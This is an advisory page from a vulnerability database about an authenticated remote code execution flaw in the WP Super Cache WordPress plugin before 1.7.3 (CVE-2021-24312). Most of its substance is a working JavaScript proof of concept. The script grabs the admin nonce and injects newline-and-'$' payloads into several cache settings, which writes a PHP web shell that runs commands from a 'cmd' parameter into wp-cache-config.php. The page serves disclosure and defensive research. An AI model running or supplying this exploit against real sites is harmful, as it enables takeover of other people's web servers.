Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpvulndbNGAWPVDB-ID:2142C3D3-9A7F-4E3C-8776-D469A355D62F
HistoryMay 14, 2021 - 12:00 a.m.

WP Super Cache < 1.7.3 - Authenticated Remote Code Execution

2021-05-1400:00:00
NGA
wpscan.com
24

0.003 Low

EPSS

Percentile

69.7%

JSON

The parameters $cache_path, $wp_cache_debug_ip, $wp_super_cache_front_page_text, $cache_scheduled_time, $cached_direct_pages used in the plugin settings result in RCE because they allow input of “$” and “\n”. This is due to an incomplete fix of CVE-2021-24209. You can run the command directly to “https://target/wp-content/wp-cache-config.php”.

PoC

//Exploit $cache_path url = ‘http://wp.lab/wordpress/wp-admin/options-general.php?page=wpsupercache&amp;tab;=settings’; jQuery.get(url,function(e){ jQuery.post(url,{ “action”: “scupdates”, “_wpnonce”: e.match(/_wpnonce"\svalue="(.+?)"/)[1], “wp_cache_enabled”: 1, “wp_cache_location”: “/tmp/\n$cache_path\necho exec($_GET[cmd]);#” }) console.log(‘SET!’); }).then(()=>{ jQuery.get(url,function(e){ jQuery.post(url,{ “action”: “scupdates”, “_wpnonce”: e.match(/_wpnonce"\svalue="(.+?)"/)[1], “wp_cache_enabled”: 1, “wp_cache_location”: “./” }) }); console.log(‘EXPLOIT!’); }); //Exploit $wp_cache_debug_ip, $wp_super_cache_front_page_text url = ‘http://[Target]/WordPress/wp-admin/options-general.php?page=wpsupercache&tab;=debug’; jQuery.get(url,function(e){ jQuery.post(url,{ “wp_cache_debug”: 1, “_wpnonce”: e.match(/_wpnonce"\svalue="(.+?)"/)[1], “wp_cache_debug_ip”: “/tmp/\n$wp_cache_debug_ip\necho exec($_GET[cmd]);#” //“wp_super_cache_front_page_text”: “/tmp/\n$wp_super_cache_front_page_text\necho exec($_GET[cmd]);#” }) console.log(‘SET!’); }).then(()=>{ jQuery.get(url,function(e){ jQuery.post(url,{ “wp_cache_debug”: 1, “_wpnonce”: e.match(/_wpnonce"\svalue="(.+?)"/)[1], “wp_cache_debug_ip”: “1” //“wp_super_cache_front_page_text”: “1” }) }); console.log(‘EXPLOIT!’); }); //Exploit $cache_scheduled_time + $cached_direct_pages url = ‘http://[Target]/WordPress/wp-admin/options-general.php?page=wpsupercache&tab;=settings’; jQuery.get(url,function(e){ jQuery.post(url,{ “action”: “scupdates”, “wp_cache_enabled”: “1”, “_wpnonce”: e.match(/_wpnonce"\svalue="(.+?)"/)[1] }) console.log(‘SET1!’); }).then(()=>{ jQuery.get(url,function(e){ jQuery.post(url,{ “action”:“expirytime”, “cache_scheduled_time”: “\n:00", "_wpnonce": e.match(/_wpnonce\"\svalue=\"(.+?)\"/)[1], "new_direct_page":";echo$_GET[cmd];#” }) }).then(()=>{ console.log(‘EXPLOIT!’); jQuery.get(url,function(e){ jQuery.post(url,{ “action”:“expirytime”, “cache_scheduled_time”: “00:00”, “_wpnonce”: e.match(/_wpnonce"\svalue="(.+?)"/)[1], “new_direct_page”:“;echo$_GET[cmd]`;#” }) }) }); console.log(‘SET2!’); });

CPENameOperatorVersion
wp-super-cachelt1.7.3

Related

wpexploit 1
osv 1
prion 1
openvas 1
nvd 1
cve 1
cvelist 1
wpexploit
wpexploit
WP Super Cache < 1.7.3 - Authenticated Remote Code Execution
2021-05-14 00:00:00
osv
osv
CVE-2021-24312
2021-06-01 14:15:08
prion
prion
Design/Logic Flaw
2021-06-01 14:15:00
openvas
openvas
WordPress WP Super Cache Plugin < 1.7.3 Multiple Vulnerabilities
2021-06-22 00:00:00
nvd
nvd
CVE-2021-24312
2021-06-01 14:15:08
cve
cve
CVE-2021-24312
2021-06-01 14:15:08
cvelist
cvelist
CVE-2021-24312 WP Super Cache < 1.7.3 - Authenticated Remote Code Execution
2021-06-01 11:33:30

0.003 Low

EPSS

Percentile

69.7%

JSON
Related for WPVDB-ID:2142C3D3-9A7F-4E3C-8776-D469A355D62F
wpexploit1osv1prion1openvas1nvd1cve1cvelist1